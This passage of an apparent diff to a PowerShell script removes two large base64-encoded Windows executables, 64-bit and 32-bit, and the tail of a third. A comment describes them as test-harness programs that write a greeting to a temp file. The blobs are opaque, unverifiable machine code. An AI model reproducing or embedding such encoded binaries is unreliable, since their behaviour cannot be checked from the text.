AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
-
-	# A bare bones test harness EXE that simply writes "Hello, world! (EXE ARGS)" to %TEMP%\testoutput.txt
-	$Encoded64BitExe = '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AAAAAEwmAAAAAAAAPCYAAAAAAACsJgAAAAAAAAAAAAAAAAAANiUAAAAAAABAJQAAAAAAAFYlAAAAAAAAaiUAAAAAAAB4JQAAAAAAAC4lAAAAAAAAnCUAAAAAAACoJQAAAAAAALIlAAAAAAAAviUAAAAAAADSJQAAAAAAAAQmAAAAAAAADCYAAAAAAAAWJgAAAAAAACQmAAAAAAAAMiYAAAAAAAAmJQAAAAAAABQlAAAAAAAABCUAAAAAAAD2JAAAAAAAAOgkAAAAAAAAhCUAAAAAAAAAAAAAAAAAAIgAQ3JlYXRlRmlsZUEAIgFFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NBADQFV3JpdGVGaWxlAEwCR2V0UHJvY0FkZHJlc3MAABsCR2V0TW9kdWxlSGFuZGxlQQAAUgBDbG9zZUhhbmRsZQBLRVJORUwzMi5kbGwAAFgBX1hjcHRGaWx0ZXIA8gFfYW1zZ19leGl0AACnAV9fZ2V0bWFpbmFyZ3MAzgFfX3NldF9hcHBfdHlwZQAAGAZleGl0AABYAl9leGl0AAoCX2NleGl0AAAaAl9jb25maWd0aHJlYWRsb2NhbGUA0AFfX3NldHVzZXJtYXRoZXJyAADiAl9pbml0dGVybV9lAOECX2luaXR0ZXJtAFwBX19DX3NwZWNpZmljX2hhbmRsZXIAAKgBX19pbml0ZW52AHgCX2Ztb2RlAAAZAl9jb21tb2RlAAAzAT90ZXJtaW5hdGVAQFlBWFhaAJkBX19jcnRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAE1TVkNSMTIwLmRsbAAAWwNfbG9jawDHBF91bmxvY2sACQJfY2FsbG9jX2NydACfAV9fZGxsb25leGl0AAIEX29uZXhpdADuAEVuY29kZVBvaW50ZXIAqQNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgDHAUdldEN1cnJlbnRQcm9jZXNzSWQAywFHZXRDdXJyZW50VGhyZWFkSWQAAIACR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAywBEZWNvZGVQb2ludGVyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD+/////////wAAAAAyot8tmSsAAM1dINJm1P//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAJgQAABAIgAAmBAAAHwRAABQIgAAfBEAAIwRAABoIgAAjBEAAFoSAAB4IgAAXBIAAL8SAACAIgAAwBIAADAUAACIIgAAMBQAAEIUAAB4IgAARBQAAHwUAAB4IgAAfBQAAJMUAAB4IgAA8BQAAD0VAACoIgAAcBUAABwWAADMIgAAIBYAAG4WAAAAIwAAcBYAACAXAADYIgAAIBcAADcXAAB4IgAAOBcAAHAXAAAIIwAAcBcAAKgXAAAIIwAA4BcAAP4XAAD4IgAAABgAACAYAAD4IgAAIBgAADsYAAD4IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAFAAAACihQKFIoVChCKIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
-	$Encoded32BitExe = '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